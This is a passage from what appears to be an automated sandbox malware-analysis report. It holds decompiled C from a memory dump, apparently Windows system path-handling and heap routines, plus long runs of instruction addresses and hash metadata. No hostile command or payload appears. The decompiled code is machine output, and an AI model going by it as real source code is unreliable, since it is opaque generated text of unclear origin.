																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E03504CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0348D130(_t427, _t494, _t511);
				}
			}










































































                                                          0x03505ba5
                                                          0x03505baa
                                                          0x03505baf
                                                          0x03505bb4
                                                          0x03505bb6
                                                          0x03505bbc
                                                          0x03505bbe
                                                          0x03505bc4
                                                          0x03505bcd
                                                          0x03505bd3
                                                          0x03505bd6
                                                          0x03505bdc
                                                          0x03505be0
                                                          0x03505be3
                                                          0x03505beb
                                                          0x03505bf2
                                                          0x03505bf8
                                                          0x03505bfe
                                                          0x03505c04
                                                          0x03505c0e
                                                          0x03505c18
                                                          0x03505c1f
                                                          0x03505c25
                                                          0x03505c2a
                                                          0x03505c2c
                                                          0x03505c32
                                                          0x03505c3a
                                                          0x03505c3f
                                                          0x03505c42
                                                          0x03505c48
                                                          0x03505c5b
                                                          0x03505c5b
                                                          0x03505c2c
                                                          0x03505cb7
                                                          0x03505cb9
                                                          0x03505cbf
                                                          0x03505cc2
                                                          0x03505cca
                                                          0x03505ccb
                                                          0x03505ccb
                                                          0x03505cd1
                                                          0x03505cd7
                                                          0x03505cda
                                                          0x03505ce1
                                                          0x03505ce4
                                                          0x03505ce7
                                                          0x03505ced
                                                          0x03505cf3
                                                          0x03505cf9
                                                          0x03505cff
                                                          0x03505d08
                                                          0x03505d0a
                                                          0x03505d0e
                                                          0x03505d10
                                                          0x00000000
                                                          0x00000000
                                                          0x03505d16
                                                          0x03505d1a
                                                          0x00000000
                                                          0x00000000
                                                          0x03505d20
                                                          0x03505d22
                                                          0x03505d25
                                                          0x03505d2f
                                                          0x03505d2f
                                                          0x03505d33
                                                          0x03505d3d
                                                          0x03505d49
                                                          0x03505d4b
                                                          0x00000000
                                                          0x00000000
                                                          0x03505d5a
                                                          0x03505d5d
                                                          0x03505d60
                                                          0x00000000
                                                          0x00000000
                                                          0x03505d66
                                                          0x03505d69
                                                          0x00000000
                                                          0x00000000
                                                          0x03505d6f
                                                          0x03505d6f
                                                          0x03505d73
                                                          0x03505d79
                                                          0x03505d7f
                                                          0x03505d86
                                                          0x03505d95
                                                          0x03505d98
                                                          0x03505dba
                                                          0x03505dcb
                                                          0x03505dce
                                                          0x03505dd3
                                                          0x03505dd6
                                                          0x03505dd8
                                                          0x03505de6
                                                          0x03505dec
                                                          0x03505dee
                                                          0x03505df1
                                                          0x03505df3
                                                          0x0350635a
                                                          0x0350635a
                                                          0x00000000
                                                          0x0350635a
                                                          0x03505dfe
                                                          0x03505e02
                                                          0x03505e05
                                                          0x03505e07
                                                          0x03505e10
                                                          0x03505e13
                                                          0x03505e1b
                                                          0x03505e1c
                                                          0x03505e21
                                                          0x03505e22
                                                          0x03505e23
                                                          0x03505e25
                                                          0x03505e2a
                                                          0x03505e2c
                                                          0x03505e2e
                                                          0x03505e36
                                                          0x03505e39
                                                          0x03505e42
                                                          0x03505e47
                                                          0x03505e4d
                                                          0x03505e54
                                                          0x03505e54
                                                          0x03505e54
                                                          0x03505e2e
                                                          0x03505e5c
                                                          0x03505e5f
                                                          0x03505e62
                                                          0x03505e64
                                                          0x03505e6b
                                                          0x03505e70
                                                          0x03505e7a
                                                          0x03505e7a
                                                          0x03505e7a
                                                          0x03505e6b
                                                          0x03505e7e
                                                          0x03505e7f
                                                          0x03505e7f
                                                          0x03505e81
                                                          0x03505e87
                                                          0x03505e8b
                                                          0x03505e8c
                                                          0x03505e8c
                                                          0x03505e8c
                                                          0x03505e9a
                                                          0x03505e9c
                                                          0x03505ea2
                                                          0x03505ea6
                                                          0x03505f50
                                                          0x03505f50
                                                          0x03505f57
                                                          0x03505f66
                                                          0x03505f66
                                                          0x03505f66
                                                          0x03505f68
                                                          0x03505f6a
                                                          0x035063d0
                                                          0x00000000
                                                          0x03505f70
                                                          0x03505f70
                                                          0x03505f91
                                                          0x03505f9c
                                                          0x03505f9e
                                                          0x03505fa4
                                                          0x03505fa6
                                                          0x0350638c
                                                          0x03506392
                                                          0x035063a1
                                                          0x035063a7
                                                          0x035063af
                                                          0x035063af
                                                          0x035063bd
                                                          0x035063d8
                                                          0x00000000
                                                          0x035063d8
                                                          0x03505fac
                                                          0x03505fb2
                                                          0x03505fb4
                                                          0x03505fbd
                                                          0x03505fc6
                                                          0x03505fce
                                                          0x03505fd4
                                                          0x03505fdc
                                                          0x03505fec
                                                          0x03505fed
                                                          0x03505fee
                                                          0x03505fef
                                                          0x03505ff9
                                                          0x03505ffa
                                                          0x03505ffb
                                                          0x03505ffc
                                                          0x03506000
                                                          0x03506004
                                                          0x03506012
                                                          0x03506012
                                                          0x03506018
                                                          0x03506019
                                                          0x0350601a
                                                          0x0350601b
                                                          0x0350601c
                                                          0x03506020
                                                          0x03506059
                                                          0x0350605c
                                                          0x03506061
                                                          0x03506061
                                                          0x03506022
                                                          0x03506022
                                                          0x03506022
                                                          0x03506025
                                                          0x0350602a
                                                          0x0350602b
                                                          0x03506031
                                                          0x03506037
                                                          0x03506038
                                                          0x0350603e
                                                          0x03506048
                                                          0x03506049
                                                          0x0350604a
                                                          0x0350604b
                                                          0x0350604c
                                                          0x0350604d
                                                          0x03506053
                                                          0x03506054
                                                          0x03506054
                                                          0x03506062
                                                          0x03506065
                                                          0x03506067
                                                          0x0350606a
                                                          0x03506070
                                                          0x03506075
                                                          0x03506076
                                                          0x03506081
                                                          0x03506087
                                                          0x03506095
                                                          0x03506099
                                                          0x0350609e
                                                          0x035060a4
                                                          0x035060ae
                                                          0x035060b0
                                                          0x035060b3
                                                          0x035060b6
                                                          0x035060b8
                                                          0x035060ba
                                                          0x035060ba
                                                          0x035060ba
                                                          0x035060ba
                                                          0x035060be
                                                          0x035060c0
                                                          0x035060c5
                                                          0x035060c5
                                                          0x035060c5
                                                          0x035060c6
                                                          0x035060cd
                                                          0x03506114
                                                          0x035060cf
                                                          0x035060cf
                                                          0x035060d4
                                                          0x035060d5
                                                          0x035060da
                                                          0x035060db
                                                          0x035060e1
                                                          0x035060e2
                                                          0x035060e8
                                                          0x035060f8
                                                          0x035060fd
                                                          0x035060fe
                                                          0x03506102
                                                          0x03506104
                                                          0x03506107
                                                          0x03506109
                                                          0x0350610b
                                                          0x0350610b
                                                          0x0350610b
                                                          0x0350610b
                                                          0x0350610f
                                                          0x0350610f
                                                          0x03506117
                                                          0x0350611a
                                                          0x0350611f
                                                          0x03506125
                                                          0x03506134
                                                          0x03506139
                                                          0x0350613f
                                                          0x03506146
                                                          0x03506148
                                                          0x0350614b
                                                          0x0350614d
                                                          0x0350614f
                                                          0x0350614f
                                                          0x0350614f
                                                          0x0350614f
                                                          0x03506153
                                                          0x03506159
                                                          0x03506159
                                                          0x0350615c
                                                          0x03506163
                                                          0x03506169
                                                          0x0350616c
                                                          0x03506172
                                                          0x03506181
                                                          0x03506186
                                                          0x03506187
                                                          0x0350618b
                                                          0x03506191
                                                          0x03506195
                                                          0x035061a3
                                                          0x035061bb
                                                          0x035061c0
                                                          0x035061c3
                                                          0x035061cc
                                                          0x035061d0
                                                          0x035061dc
                                                          0x035061de
                                                          0x035061e1
                                                          0x035061e4
                                                          0x035061e6
                                                          0x035061e8
                                                          0x035061e8
                                                          0x035061e8
                                                          0x035061e8
                                                          0x035061e6
                                                          0x035061ec
                                                          0x035061f3
                                                          0x03506203
                                                          0x03506209
                                                          0x0350620a
                                                          0x03506216
                                                          0x0350621d
                                                          0x03506227
                                                          0x03506241
                                                          0x03506246
                                                          0x0350624c
                                                          0x03506257
                                                          0x03506259
                                                          0x0350625c
                                                          0x0350625e
                                                          0x03506260
                                                          0x03506260
                                                          0x03506260
                                                          0x03506260
                                                          0x0350625e
                                                          0x03506264
                                                          0x03506267
                                                          0x03506269
                                                          0x03506315
                                                          0x03506315
                                                          0x0350631b
                                                          0x0350631e
                                                          0x03506324
                                                          0x03506327
                                                          0x0350632f
                                                          0x03506330
                                                          0x03506333
                                                          0x0350633a
                                                          0x0350633c
                                                          0x03506335
                                                          0x03506335
                                                          0x03506335
                                                          0x0350633f
                                                          0x03506342
                                                          0x0350634c
                                                          0x03506352
                                                          0x03506355
                                                          0x03506355
                                                          0x03506359
                                                          0x00000000
                                                          0x0350626f
                                                          0x03506275
                                                          0x03506275
                                                          0x03506278
                                                          0x0350627e
                                                          0x0350627e
                                                          0x03506281
                                                          0x03506287
                                                          0x0350628d
                                                          0x03506298
                                                          0x0350629c
                                                          0x035062a2
                                                          0x0350629e
                                                          0x0350629e
                                                          0x0350629e
                                                          0x035062a7
                                                          0x035062a7
                                                          0x035062aa
                                                          0x035062b0
                                                          0x035062f0
                                                          0x035062f0
                                                          0x035062f2
                                                          0x035062f8
                                                          0x035062fd
                                                          0x035062b2
                                                          0x035062b2
                                                          0x035062b2
                                                          0x035062b5
                                                          0x035062dd
                                                          0x035062e2
                                                          0x035062e5
                                                          0x035062b7
                                                          0x035062b8
                                                          0x035062bb
                                                          0x035062bd
                                                          0x035062c0
                                                          0x035062c4
                                                          0x035062cd
                                                          0x035062cd
                                                          0x035062c0
                                                          0x035062bb
                                                          0x035062b5
                                                          0x03506302
                                                          0x03506303
                                                          0x03506305
                                                          0x03506305
                                                          0x03506305
                                                          0x0350630c
                                                          0x0350630c
                                                          0x00000000
                                                          0x0350627e
                                                          0x03506269
                                                          0x03505eac
                                                          0x03505ebb
                                                          0x03505ebe
                                                          0x03505ecb
                                                          0x03505ecb
                                                          0x03505ece
                                                          0x03505ece
                                                          0x03505ed4
                                                          0x03505ed7
                                                          0x03505ed9
                                                          0x03505edb
                                                          0x03505edb
                                                          0x03505ee1
                                                          0x03505ee1
                                                          0x03505ee3
                                                          0x03505f20
                                                          0x03505f20
                                                          0x03505ee5
                                                          0x03505ee5
                                                          0x03505ee5
                                                          0x03505ee8
                                                          0x03505f11
                                                          0x03505f18
                                                          0x03505eea
                                                          0x03505eea
                                                          0x03505eed
                                                          0x03505ef2
                                                          0x03505ef8
                                                          0x03505efb
                                                          0x03505f0a
                                                          0x03505f0a
                                                          0x03505eed
                                                          0x03505ee8
                                                          0x03505f22
                                                          0x03505f28
                                                          0x00000000
                                                          0x00000000
                                                          0x03505f30
                                                          0x03505f31
                                                          0x03505f37
                                                          0x03505f3a
                                                          0x03505f3d
                                                          0x03505f44
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x03505f46
                                                          0x03505f48
                                                          0x03505f4d
                                                          0x00000000
                                                          0x03505f4d
                                                          0x03505dda
                                                          0x03505ddf
                                                          0x00000000
                                                          0x03505ddf
                                                          0x03505dd8
                                                          0x03505da7
                                                          0x03505da9
                                                          0x03505dac
                                                          0x03505dae
                                                          0x00000000
                                                          0x03505db4
                                                          0x03505db4
                                                          0x00000000
                                                          0x03505db4
                                                          0x03505dae
                                                          0x03505d88
                                                          0x03505d8d
                                                          0x03506363
                                                          0x03506369
                                                          0x0350636a
                                                          0x03506370
                                                          0x03506372
                                                          0x0350637a
                                                          0x0350637b
                                                          0x0350637d
                                                          0x00000000
                                                          0x00000000
                                                          0x0350637f
                                                          0x03506385
                                                          0x00000000
                                                          0x03506385
                                                          0x03505d38
                                                          0x03505d3b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x03505d3b
                                                          0x03505d27
                                                          0x03505d29
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x03506360
                                                          0x00000000
                                                          0x03506360
                                                          0x03505c10
                                                          0x03505c10
                                                          0x035063da
                                                          0x035063e5
                                                          0x035063e5

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e6a4c8cdbe3caae04f822f612126cf88a754eaf5123640b424a671610bfc2916
                                                          • Instruction ID: 8f804d92f7644e4b127bb86ca556be4318b4db65ee5e8d3b4809dfcf51a490fb
                                                          • Opcode Fuzzy Hash: e6a4c8cdbe3caae04f822f612126cf88a754eaf5123640b424a671610bfc2916
                                                          • Instruction Fuzzy Hash: 7C426B75900229CFDB24CF68D880BA9F7B1FF45304F1885EAD84DAB291E7359A95CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03454120, Relevance: .4, Instructions: 444COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 92%
                                                          			E03454120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x352d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0346F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E03456E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L03454620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E03456E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M034545F8))) {
												case 0:
													_v568 = 0x3411078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x34111c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L03454620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0347F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0347F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E034352A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0344EB70(1, 0x35279a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0344AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E034795D0();
																			L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0347B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E03473D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0347B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                          0x03454128
                                                          0x03454135
                                                          0x0345413c
                                                          0x03454141
                                                          0x03454145
                                                          0x03454147
                                                          0x0345414e
                                                          0x03454151
                                                          0x03454159
                                                          0x0345415c
                                                          0x03454160
                                                          0x03454164
                                                          0x03454168
                                                          0x0345416c
                                                          0x0345417f
                                                          0x03454181
                                                          0x0345446a
                                                          0x0345446a
                                                          0x0345418c
                                                          0x03454195
                                                          0x03454199
                                                          0x03454432
                                                          0x03454439
                                                          0x0345443d
                                                          0x03454442
                                                          0x03454447
                                                          0x00000000
                                                          0x0345419f
                                                          0x034541a3
                                                          0x034541b1
                                                          0x034541b9
                                                          0x034541bd
                                                          0x034545db
                                                          0x034545db
                                                          0x00000000
                                                          0x034541c3
                                                          0x034541c3
                                                          0x034541ce
                                                          0x034541d4
                                                          0x0349e138
                                                          0x0349e13e
                                                          0x0349e169
                                                          0x0349e16d
                                                          0x0349e19e
                                                          0x0349e16f
                                                          0x0349e16f
                                                          0x0349e175
                                                          0x0349e179
                                                          0x0349e18f
                                                          0x0349e193
                                                          0x00000000
                                                          0x0349e199
                                                          0x00000000
                                                          0x0349e199
                                                          0x0349e193
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x034541da
                                                          0x034541da
                                                          0x034541df
                                                          0x034541e4
                                                          0x034541ec
                                                          0x03454203
                                                          0x03454207
                                                          0x0349e1fd
                                                          0x03454222
                                                          0x03454226
                                                          0x0349e1f3
                                                          0x0349e1f3
                                                          0x0345422c
                                                          0x0345422c
                                                          0x03454233
                                                          0x0349e1ed
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x03454239
                                                          0x03454239
                                                          0x03454239
                                                          0x03454239
                                                          0x03454233
                                                          0x03454226
                                                          0x034541ee
                                                          0x034541ee
                                                          0x034541f4
                                                          0x03454575
                                                          0x0349e1b1
                                                          0x0349e1b1
                                                          0x00000000
                                                          0x0345457b
                                                          0x0345457b
                                                          0x03454582
                                                          0x0349e1ab
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x03454588
                                                          0x03454588
                                                          0x0345458c
                                                          0x0349e1c4
                                                          0x0349e1c4
                                                          0x00000000
                                                          0x03454592
                                                          0x03454592
                                                          0x03454599
                                                          0x0349e1be
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0345459f
                                                          0x0345459f
                                                          0x034545a3
                                                          0x0349e1d7
                                                          0x0349e1e4
                                                          0x00000000
                                                          0x034545a9
                                                          0x034545a9
                                                          0x034545b0
                                                          0x0349e1d1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x034545b6
                                                          0x034545b6
                                                          0x034545b6
                                                          0x00000000
                                                          0x034545b6
                                                          0x034545b0
                                                          0x034545a3
                                                          0x03454599
                                                          0x0345458c
                                                          0x03454582
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x034541f4
                                                          0x0345423e
                                                          0x03454241
                                                          0x034545c0
                                                          0x034545c4
                                                          0x00000000
                                                          0x034545ca
                                                          0x034545ca
                                                          0x00000000
                                                          0x0349e207
                                                          0x0349e20f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x034545d1
                                                          0x00000000
                                                          0x00000000
                                                          0x034545ca
                                                          0x00000000
                                                          0x03454247
                                                          0x03454247
                                                          0x03454247
                                                          0x03454249
                                                          0x03454249
                                                          0x03454249
                                                          0x03454251
                                                          0x03454251
                                                          0x03454257
                                                          0x0345425f
                                                          0x0345426e
                                                          0x03454270
                                                          0x0345427a
                                                          0x0349e219
                                                          0x0349e219
                                                          0x03454280
                                                          0x03454282
                                                          0x03454456
                                                          0x034545ea
                                                          0x00000000
                                                          0x034545f0
                                                          0x0349e223
                                                          0x00000000
                                                          0x0349e223
                                                          0x0345445c
                                                          0x0345445c
                                                          0x00000000
                                                          0x0345445c
                                                          0x00000000
                                                          0x03454288
                                                          0x0345428c
                                                          0x0349e298
                                                          0x03454292
                                                          0x03454292
                                                          0x0345429e
                                                          0x034542a3
                                                          0x034542a7
                                                          0x034542ac
                                                          0x0349e22d
                                                          0x034542b2
                                                          0x034542b2
                                                          0x034542b9
                                                          0x034542bc
                                                          0x034542c2
                                                          0x034542ca
                                                          0x034542cd
                                                          0x034542cd
                                                          0x034542d4
                                                          0x0345433f
                                                          0x0345433f
                                                          0x034542d6
                                                          0x034542d6
                                                          0x034542d9
                                                          0x034542dd
                                                          0x034542eb
                                                          0x0349e23a
                                                          0x034542f1
                                                          0x03454305
                                                          0x0345430d
                                                          0x03454315
                                                          0x03454318
                                                          0x0345431f
                                                          0x03454322
                                                          0x0345432e
                                                          0x0345433b
                                                          0x0345433b
